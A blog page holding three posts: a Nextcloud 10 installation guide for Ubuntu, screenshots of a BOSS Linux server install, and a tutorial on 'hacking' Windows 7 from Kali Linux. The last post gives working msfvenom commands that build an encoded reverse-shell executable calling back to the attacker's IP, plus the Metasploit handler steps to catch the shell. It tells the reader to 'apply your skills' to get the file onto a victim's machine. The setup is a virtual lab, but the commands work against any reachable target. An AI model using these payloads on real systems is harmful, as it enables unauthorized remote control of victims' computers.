Social Icons

Sunday, September 04, 2016

Nextcloud 10 installation @ Ubuntu 16.04 LTS

1.   Nextcloud is open source file sync and share software for everyone from individuals operating the free Nextcloud Server in the privacy of their own home, to large enterprises and service providers supported by the Nextcloud Enterprise Subscription. Nextcloud provides a safe, secure, and compliant file synchronization and sharing solution on servers that you control.

2.   This post shares screen shots of my installation of the same in UBUNTU 16.04 LTS.The screen-shots are self explanatory along with the command sets available for direct lift if one is interested.

Reference help of this post : https://www.facebook.com/expertresearcher
Video post of this at https://www.youtube.com/watch?v=nXr_muYB6xI

Here's my ip address configuration as set on the virtual machine Ubuntu.
Terminal commands :

> apt-get update
 
 > apt-get install lamp-server^


> apt-get install libapache2-mod-php7.0 php7.0-mbstring php7.0-curl php7.0-zip php7.0-gd php7.0-mysql php7.0-mcrypt
> apt-get install php-xml
Goto the nextcloud site at https://nextcloud.com/install/ and download the zip file for nextcloud installation.This one is version 10

Downloading here as seen completing :
Goto the Downloads folder and unzip it
> unzip nextcloud-10.0.0.zip

> mv nextcloud /var/www/html
> chown -R www-data:www-data /var/www/html/nextcloud

Now we need to Configure MariaDB for this vide these commands as mentioned :
> mysql_secure_installation
Type Yes for all except may be root password which u might want to retain.

CREATE DATABASE nextcloud;
GRANT ALL PRIVILEGES ON nextcloud.* TO 'nextcloud'@'localhost' IDENTIFIED BY 'anupam';
FLUSH PRIVILEGES;
exit;



> Gedit /etc/mysql/my.cnf

Add the following three lines at the end:
log-bin = /var/log/mysql/mariadb-bin
log-bin-index = /var/log/mysql/mariadb-bin.index
binlog_format = mixed

 

Now we need to Configure Apache Web Server
> sudo a2enmod rewrite
> touch /etc/apache2/sites-available/nextcloud.conf
> ln -s /etc/apache2/sites-available/nextcloud.conf /etc/apache2/sites-enabled/nextcloud.conf
> nano /etc/apache2/sites-available/nextcloud.conf


Add the following:

ServerAdmin admin@ubuntu
DocumentRoot "/var/www/html/nextcloud/"
ServerName youripaddress
ServerAlias ubuntu

Options FollowSymLinks
AllowOverride All
Order allow,deny
allow from all

ErrorLog /var/log/apache2/your-domain.com-error_log
CustomLog /var/log/apache2/your-domain.com-access_log common

here you ready to go....just type the ipaddress in the web browser...

Wednesday, August 24, 2016

BOSS Advanced server : Installation screenshots

1.   Bharat Operating System Solutions (BOSS) is a free and open source Linux distribution developed by the National Resource Centre for Free/Open Source Software (NRCFOSS) of India. BOSS GNU/Linux is also known by the acronym BOSS. The latest version is 6.0

2.    BOSS Advanced server supports Intel and AMD x86-64 architecture. It is bundled with web server, proxy server, database server, mail server, network server, file server, SMS server and LDAP server. It also contains various administrative tools as webmin, Gadmin, PHP myadmin, PHP LDAP admin and PG admin.This post gives a step wise screen shot sequence as it happens in a virtual box environment while installing the server edition of BOSS
































Tuesday, July 12, 2016

Windows 7 Hacked @ Kali Linux - msfvenom

This post gives you a step by step way to get shell or command terminal of a victim user on Windows 7 OS from an other PC with a loaded Kali OS.The setup scenario is like this as seen in the screen shots below in a virtual box environment :

KALI LINUX : IP Address eth1 : 192.168.1.7
 Windows 7 Ultimate Machine : IP Address : 192.168.1.8
 Pinging from Kali LInux Machine to Windows 7 Machine
 Pinging from Windows 7 to Kali Linux Machine
msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tools.Now need to go to Kali terminal and execute the following command :

p /windows/meterpreter/reverse_tcp designates the payload we want to embed
LHOST designates the local host
LPORT designates the port we want to listen on
-x designates the template we want to use and the path to it
-e x86/shikata_ga_nai designates the encoder we want to use
-f exe designates we want to create an executable (.exe)
anupam.exe designates the name of the file created

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.7 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/anupam.exe
Click to Enlarge
Followed by the following sets of command :

root@kali:~# file /tmp/anupam.exe

root@kali:~# msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > show options

msf exploit(handler) > set payload windows/shell/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set LHOST 192.168.1.7

msf exploit(handler) > set LPORT 3333

msf exploit(handler) > exploit

 
Now you need to apply your skills to take the file ..anupam.exe in this case to the windows machine.In my case for example,i have placed it on the desktop as seen below :
The moment the file anupam.exe is clicked and executed from the windows machine,we get the shell on the Kali Linux machine as seen below :
Here you have the C:\ prompt from the windows machine :-)
Powered By Blogger